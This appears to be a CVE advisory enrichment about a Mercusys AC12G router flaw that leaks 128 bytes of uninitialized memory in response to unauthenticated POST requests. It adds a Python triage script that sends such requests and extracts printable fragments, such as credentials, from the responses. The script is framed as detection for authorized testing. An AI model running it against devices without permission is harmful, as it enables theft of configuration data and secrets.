Impact
The CVE describes that the Mercusys AC12G (EU) V1 router returns 128 bytes of uninitialized internal buffer content when it receives an HTTP POST request to an undefined path. An unauthenticated attacker who can reach the device's HTTP interface can therefore retrieve a 128-byte slice of whatever stale data that buffer last held with a single request, and because the content depends on what the memory previously contained, repeated requests may expose different data. The weakness is a classic information-disclosure flaw: it breaches confidentiality but does not by itself bypass authentication or give control of the device.
Affected Systems
The affected product is the Mercusys AC12G (EU) V1 router running firmware version AC12G(EU)_V1_200909. No other vendors or products are listed.
Risk and Exploitability
Exploitation requires only network access to the device's HTTP interface: the attacker sends a POST request to any undefined URI and reads the response body. No authentication is needed, so the exposed surface is the management interface as reachable from the LAN, plus the WAN side if remote management or port forwarding exposes it. No EPSS score is available, and the vulnerability is not in the CISA KEV catalog, which means no in-the-wild exploitation has been recorded there, not that none occurs. The CVSS score of 4.3 (Medium) reflects an impact limited to confidentiality: there is no code execution or denial of service. Overall the risk is moderate, and the likelihood of exploitation depends mainly on whether the HTTP interface is reachable from untrusted networks.
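As an added triage example (not from the advisory, the vendor or OpenCVE), the following Python script sends a few POST requests to a path that should not exist on the router's HTTP interface and flags the response bodies if they look like leaked memory rather than an error page: exactly 128 bytes long, varying between identical requests, and mostly non-printable. The probe path, the host argument and the sample response bodies are assumptions constructed for the example; the live probe only runs when a host is given on the command line and should only be pointed at a device you are authorized to test.

```python
import http.client
import string
import sys
from dataclasses import dataclass

LEAK_LENGTH = 128                    # leak size stated in the advisory
PROBE_PATH = "/gr-probe-undefined"   # assumed: any path the firmware does not define
PRINTABLE = set(bytes(string.printable, "ascii"))
WHITESPACE = b"\r\n\t\x0b\x0c"


@dataclass
class Verdict:
    leak_suspected: bool
    lengths: list
    distinct_bodies: int
    printable_ratio: float
    printable_fragments: list


def printable_fragments(body: bytes, min_len: int = 4) -> list:
    """Return runs of at least min_len printable bytes; these are the parts of a
    leak an analyst reads first (URLs, credentials, config keys)."""
    frags, cur = [], bytearray()
    for b in body:
        if b in PRINTABLE and b not in WHITESPACE:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                frags.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        frags.append(cur.decode("ascii"))
    return frags


def assess(bodies: list) -> Verdict:
    """Heuristic: bodies that are all exactly LEAK_LENGTH bytes and either change
    between identical requests or are not clean text are consistent with
    uninitialized memory; an error page is text and identical every time."""
    lengths = [len(b) for b in bodies]
    distinct = len(set(bodies))
    total = sum(lengths) or 1
    printable = sum(1 for b in bodies for c in b if c in PRINTABLE)
    ratio = printable / total
    suspected = (
        len(bodies) > 0
        and all(n == LEAK_LENGTH for n in lengths)
        and (distinct > 1 or ratio < 0.9)
    )
    frags = sorted({f for b in bodies for f in printable_fragments(b)})
    return Verdict(suspected, lengths, distinct, ratio, frags)


def probe(host: str, port: int = 80, attempts: int = 3, timeout: float = 5.0) -> list:
    """Live check: POST to the undefined path several times and collect the bodies.
    Several attempts are needed because a leak varies while an error page does not."""
    bodies = []
    for _ in range(attempts):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("POST", PROBE_PATH, body=b"x=1",
                         headers={"Content-Type": "application/x-www-form-urlencoded",
                                  "Content-Length": "3"})
            bodies.append(conn.getresponse().read())
        finally:
            conn.close()
    return bodies


# Constructed sample responses (not captured from a device): two 128-byte bodies that
# differ from each other and mix binary with a text fragment, versus a normal 404 page.
SAMPLE_LEAK = [
    b"\x00\x10\x7f\x00" * 8 + b"admin=1&" + b"\xde\xad\xbe\xef" * 22,
    b"\x00\x10\x7f\x00" * 8 + b"\xff" * 72 + b"cfg\x00" * 6,
]
SAMPLE_404 = [b"<html><body>404 Not Found</body></html>"] * 3

if __name__ == "__main__":
    bodies = probe(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LEAK
    print(assess(bodies))
```

Run without arguments it evaluates the constructed samples; with a host argument it performs the live probe. A positive verdict is a reason to capture the bodies and review the printable fragments for credentials or configuration data, which is what decides whether the leak is a nuisance or a real exposure on a given deployment.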
OpenCVE Enrichment